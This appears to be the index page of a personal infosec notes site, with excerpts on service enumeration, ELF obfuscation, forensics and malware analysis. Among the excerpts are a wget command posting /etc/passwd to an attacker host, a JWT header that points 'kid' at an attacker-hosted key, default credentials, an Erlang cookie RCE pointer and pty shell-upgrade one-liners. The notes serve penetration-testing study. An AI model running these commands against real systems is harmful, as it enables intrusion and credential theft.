A Message broker, written in Erlang. Uses the Erlang Cowboy webserver. Notes Default credentials: guest / guest (works per defalt only from localhost) Username can be changed without the old password on the command line?!rabbitmqctl change_password username newpassword Files with suffix .DCD contain credentials. If you have the Erlang cookie:erl -cookie JPCGJCAEWHPKKPBXBYYB -name rabbit -sname…
Erlang Port Mapper Daemon Enumeration Mandatory Check if epmd is runningecho -n -e "\x00\x01\x6e" | nc -vn $target 4369 Check with nmapnmap -sV -Pn -n -T4 -p 4369 --script epmd-info $target Brute force the key with https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ and try the RCE.
Listing of all files from a Xampp for Windows 7.4.6 installation. Look into phpinfo page — could reveals usernames.
Post files wget --post-file=/etc/passwd http://$attacker_ip/ Set output file: wget -O /tmp/s http://...
Use https://jwt.io/ to decode JWT It also shows the various parts. A JWT token has multiple parts in base64, separated by a point character. Create JWT token Create PEM SSH key: openssl genrsa -out private.pem 2048 Create base64 from header and payload: $ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed s/+/-/ | sed -E s/=+$// =>…
Example of a connection: openssl s_client -connect $target:995 -crlf -quiet Issues The following message means that the server and client could not agree on a shared crypto system; probably because the server’s crypto is too old. 139763095926080:error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol:../ssl/statem/statem_lib.c:1957: Add TLS 1 support: openssl s_client -connect $target:995 -crlf -quiet -tls1
Enumeration Mandatory Try to connect: Start the console:/opt/mysql-shell-8.0.23-linux-glibc2.12-x86-64bit/bin# ./mysqlsh Try to connect with default credentials or found ones:MySQL JS > var test_conn = require('mysqlx');MySQL JS > var session = mysqlx.getSession({host: '192.168.156.58', user: 'root', password: 'root', port: 33060});
Enumeration Mandatory Check CVE-2020–11651 Note that execution of scheduled tasks can take 5–10 minutes.
Enumeration Try to just login. Per default, no user is required.mongodb $target Enumerate with NSE scriptsnmap -sV --script "mongo* and default" -p 27017 $target Try to connectmongo 'mongodb://nodebb:nodebb@192.168.91.69:27017/nodebb' Optional Try https://github.com/codingo/NoSQLMap
Enumeration Code execution I am stuck
Simple protection A packer can be used to “optimize” / “compress” a binary which on the other hand also makes it harder to debug. A packer removes unesessary information and the minification can lead also to obfuscation to some extend. A standard tool is UPX. Minimize a binary with upx -9 bin.elf. Advanced protection Obfuscation…
This post describes methods to transform/obfuscate/minimize Linux ELF files. sstrip The sections are used for debugging and not neccessary for a program’s execution. The command sstrip removes all sections from the file. sstrip bin.elf After the command, it can be verified with readelf --sections bin.elf that there are not sections are in the file.
Concepts A segment is a piece of a information which is mapped into the memory (of a process). A ELF binary can have zero or multiple segments. It defines also where the OS should put it into the memory. Each segment has a Program Header which describes the sections within. A section is a distinctive…
Overwrite functions with LD_PRELOAD The LD_PRELOAD environment variable allows to inject a library which is loaded before the program libraries. This means that it is possible to redirect the execution flow to an injected function via an own library object.
This page collects tools for the Linux Executable and Linking Format (ELF) with some basic commands. checksec.sh Shows which exploits mitigations a program has. (Source) ./checksec.sh --file file.elf GDB See the gdb post. Objdump Objdump shows information about a binary (object) file. Show the assemble code from a ELF file. objdump -d bin.elf Show all symbols (e.g.…
Mirroring gittyleaks: Execute within a local repository the command gittyleaks --find-anything. git-secrets: Scans (only) commit messages for sensitive information with git secrets --scan-history. truffleHog: Scans repos and prints out information with a high entropy: Execute it with trufflehog $repo_dir. git-secret-scanner: Scans a repo with git-secret-scanner scan -d $git_repo. Other tools
See also MemProcFS The forensic memory framework Volatility (Version 3 since 2019) offers a wide range of methods to analyse memory. See the blog post Retrieving memory for methods and techniques to obtain memory. Start by getting general information about a memory dump: volatility -f image.mem imageinfo Now use the following commands to get more information:…
Yet another ridicolous acrynom is a tool for detect information in binary and text files. YARA rules are writen in text files. By calling yara with a rule file and a file to test, it either returns nothing if no rule was detected or one or multiple rules which matches the provided file. Example: The follwing rule…
Malware (Notes are taken from the TryHackMe course.) John von Neumann (!) created a concept of malicious software in 1949. The first implementation was done in 1971 by Bob Thomas. The program Creeper jumped from one system (running the operating system Tenex) to another and just printed a message on each console. The team Nematode is…
Addresses within the memory are referenced with @ General Starting with directly analysing all referenced code. r2 -A $file ... e emu.str = true Starting with enabled debugger (only when I want to execute the program) r2 -AA -e dbg.follow.child=true -e dbg.forks=true -d $file ... e emu.str = true Fork parameter: If the process forks, the debugger halts Type…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';